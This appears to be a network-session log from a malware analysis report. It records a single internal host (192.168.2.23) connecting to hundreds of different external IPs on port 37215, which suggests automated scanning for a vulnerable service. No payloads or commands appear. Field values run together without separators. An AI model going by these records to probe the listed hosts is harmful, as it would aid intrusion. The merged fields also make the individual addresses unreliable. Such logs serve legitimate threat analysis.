                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11767192.168.2.2358764197.173.108.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11768192.168.2.2351454157.14.223.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11769192.168.2.2346916157.106.84.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11770192.168.2.2360576157.118.66.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11771192.168.2.235982641.247.41.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11772192.168.2.2356704157.52.8.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11773192.168.2.2359076157.87.29.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11774192.168.2.233641241.66.147.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11775192.168.2.236053641.192.235.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11776192.168.2.233907441.118.62.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11777192.168.2.2360818157.44.244.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11778192.168.2.2357636204.50.163.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11779192.168.2.234511641.157.207.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11780192.168.2.2349470157.8.206.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11781192.168.2.2338350157.243.90.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11782192.168.2.2345498197.167.186.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11783192.168.2.236076841.152.32.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11784192.168.2.234477685.42.242.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11785192.168.2.235787641.163.78.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11786192.168.2.233660441.158.98.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11787192.168.2.234155445.218.64.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11788192.168.2.234783841.161.185.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11789192.168.2.235459241.25.83.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11790192.168.2.2340592157.207.183.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11791192.168.2.235776676.42.37.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11792192.168.2.2351458108.151.20.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11793192.168.2.233499047.114.212.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11794192.168.2.2338312124.127.95.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11795192.168.2.235696841.248.190.20837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11796192.168.2.2349194176.93.68.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11797192.168.2.234533641.54.161.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11798192.168.2.2352728197.249.232.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11799192.168.2.2336620157.101.26.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11800192.168.2.2357368157.217.109.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11801192.168.2.2337186198.75.22.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11802192.168.2.2343534197.149.3.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11803192.168.2.2344664157.201.240.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11804192.168.2.2348086197.116.178.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11805192.168.2.2342132197.168.79.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11806192.168.2.2336616104.212.0.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11807192.168.2.2343356199.52.38.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11808192.168.2.2352810157.33.59.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11809192.168.2.2335872178.199.125.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11810192.168.2.233787241.243.69.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11811192.168.2.2335584197.234.234.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11812192.168.2.234511265.65.49.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11813192.168.2.2359810197.33.122.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11814192.168.2.2340298157.93.57.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11815192.168.2.235222641.69.207.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11816192.168.2.2345322103.47.150.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11817192.168.2.2349064157.67.112.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11818192.168.2.233727898.127.206.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11819192.168.2.2348168197.132.80.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11820192.168.2.2355148197.30.228.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11821192.168.2.2355306204.7.64.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11822192.168.2.235666854.40.86.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11823192.168.2.2350510197.59.220.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11824192.168.2.2333290157.100.250.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11825192.168.2.2335530157.168.8.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11826192.168.2.2339888197.202.113.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11827192.168.2.2351624197.176.106.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11828192.168.2.2347050197.133.134.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11829192.168.2.2341202197.104.159.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11830192.168.2.2347004197.167.251.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11831192.168.2.2347924147.233.44.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11832192.168.2.234328817.249.5.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11833192.168.2.2346096157.121.95.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11834192.168.2.2351950197.91.126.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11835192.168.2.233447841.131.114.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11836192.168.2.2339686157.12.54.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11837192.168.2.2353954197.249.169.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11838192.168.2.234406088.183.171.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11839192.168.2.2347088157.24.38.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11840192.168.2.2360370157.177.179.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11841192.168.2.235005241.165.20.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11842192.168.2.2343638116.104.3.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11843192.168.2.233795663.223.198.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11844192.168.2.235786041.192.199.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11845192.168.2.233836041.180.19.4737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11846192.168.2.235857265.125.136.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11847192.168.2.2357326197.193.42.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11848192.168.2.2360496157.184.58.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11849192.168.2.2345548197.187.143.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11850192.168.2.2341460188.31.62.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11851192.168.2.235955477.83.15.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11852192.168.2.236095041.208.11.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11853192.168.2.233753841.235.98.8537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11854192.168.2.234538441.7.200.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11855192.168.2.2339326197.239.34.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11856192.168.2.2335394197.196.43.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11857192.168.2.234946442.221.186.4737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11858192.168.2.235667241.185.191.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11859192.168.2.2344520157.71.41.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11860192.168.2.2349410197.11.153.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11861192.168.2.233686641.223.83.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11862192.168.2.2355660157.41.53.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11863192.168.2.2358516157.227.147.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11864192.168.2.234662441.164.48.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11865192.168.2.2345748197.201.180.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11866192.168.2.2340552197.82.229.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11867192.168.2.2348428157.220.159.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11868192.168.2.234373841.206.86.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11869192.168.2.234672441.215.15.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11870192.168.2.234519041.172.162.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11871192.168.2.235141041.223.130.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11872192.168.2.2344172185.237.208.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11873192.168.2.2338788200.81.5.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11874192.168.2.2351910157.132.11.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11875192.168.2.2354534197.9.194.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11876192.168.2.234579841.227.19.12137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11877192.168.2.2339778207.11.78.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11878192.168.2.2343590197.3.213.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11879192.168.2.2334896197.21.144.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11880192.168.2.2360474151.53.194.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11881192.168.2.235649078.133.185.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11882192.168.2.235562241.167.55.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11883192.168.2.2350360197.135.239.20837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11884192.168.2.2339012115.168.172.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11885192.168.2.2351148157.238.61.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11886192.168.2.2335994197.106.170.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11887192.168.2.233739641.208.174.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11888192.168.2.234763641.213.95.15637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11889192.168.2.235156641.109.139.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11890192.168.2.2358410157.208.228.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11891192.168.2.233907041.173.216.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11892192.168.2.2349960197.234.204.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11893192.168.2.2343776197.40.41.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11894192.168.2.235187841.87.168.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11895192.168.2.234453014.32.163.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11896192.168.2.2355296197.134.117.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11897192.168.2.234792441.76.103.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11898192.168.2.2354078157.30.9.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11899192.168.2.2341524146.5.109.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11900192.168.2.2338708157.70.106.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11901192.168.2.2333758157.188.118.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11902192.168.2.2349292186.86.224.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11903192.168.2.235112841.77.200.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11904192.168.2.2353560197.20.159.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11905192.168.2.2350086197.203.141.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11906192.168.2.2346122157.230.35.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11907192.168.2.233350270.230.168.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11908192.168.2.2358620197.236.28.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11909192.168.2.2333432197.209.107.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11910192.168.2.2350382197.89.152.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11911192.168.2.234554441.126.184.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11912192.168.2.2358614157.18.222.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11913192.168.2.2335416157.74.52.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11914192.168.2.234855641.71.194.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11915192.168.2.2338754157.71.203.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11916192.168.2.235756624.210.188.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11917192.168.2.2358296157.77.159.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11918192.168.2.2342320157.224.201.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11919192.168.2.234611266.60.36.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11920192.168.2.2358158197.165.170.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11921192.168.2.236073041.56.69.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11922192.168.2.2358794201.36.85.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11923192.168.2.2343832141.241.101.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11924192.168.2.2340712197.228.131.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11925192.168.2.234390841.220.163.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11926192.168.2.2348366115.183.56.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11927192.168.2.2345012218.220.40.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11928192.168.2.2359812197.24.30.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11929192.168.2.2335982184.8.24.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11930192.168.2.2346602157.2.106.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11931192.168.2.234633641.130.22.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11932192.168.2.23395949.102.126.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11933192.168.2.234475041.91.233.1037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11934192.168.2.234126097.208.33.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11935192.168.2.2358908197.11.254.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11936192.168.2.2354832197.110.198.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11937192.168.2.2345666197.179.187.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11938192.168.2.2351566157.184.172.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11939192.168.2.234983241.208.186.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11940192.168.2.2355314197.148.208.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11941192.168.2.233442241.138.105.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11942192.168.2.2359474197.116.149.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11943192.168.2.235892441.161.173.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11944192.168.2.234782850.218.169.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11945192.168.2.234791689.66.40.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11946192.168.2.233993241.92.184.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11947192.168.2.233824070.41.255.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11948192.168.2.2343080157.17.101.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11949192.168.2.2336954132.252.104.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11950192.168.2.233399841.187.108.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11951192.168.2.235062041.62.254.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11952192.168.2.234201241.40.112.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11953192.168.2.2343012197.77.2.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11954192.168.2.2348918157.7.196.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11955192.168.2.2346034157.68.176.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11956192.168.2.2348350197.255.201.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11957192.168.2.235811041.250.243.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11958192.168.2.235172893.146.184.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11959192.168.2.233789441.172.235.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11960192.168.2.2333824197.70.178.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11961192.168.2.233860041.155.122.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11962192.168.2.234784241.226.151.1037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11963192.168.2.2334600157.237.182.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11964192.168.2.2339362197.228.233.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11965192.168.2.235422641.226.150.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11966192.168.2.2359490197.26.99.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11967192.168.2.234252441.117.8.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11968192.168.2.2335818157.54.102.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11969192.168.2.2340150157.100.45.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11970192.168.2.235132041.220.33.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11971192.168.2.2339734197.50.219.8537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11972192.168.2.234639299.53.126.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11973192.168.2.2351602197.31.38.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11974192.168.2.233553446.137.27.13337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11975192.168.2.2342230197.22.48.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11976192.168.2.2342136157.135.42.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11977192.168.2.2347164197.63.101.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11978192.168.2.2350346157.213.26.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11979192.168.2.234030241.125.40.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11980192.168.2.2350964157.152.37.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11981192.168.2.2352246157.23.62.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11982192.168.2.234264641.149.245.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11983192.168.2.234981241.242.94.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11984192.168.2.235093663.77.42.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
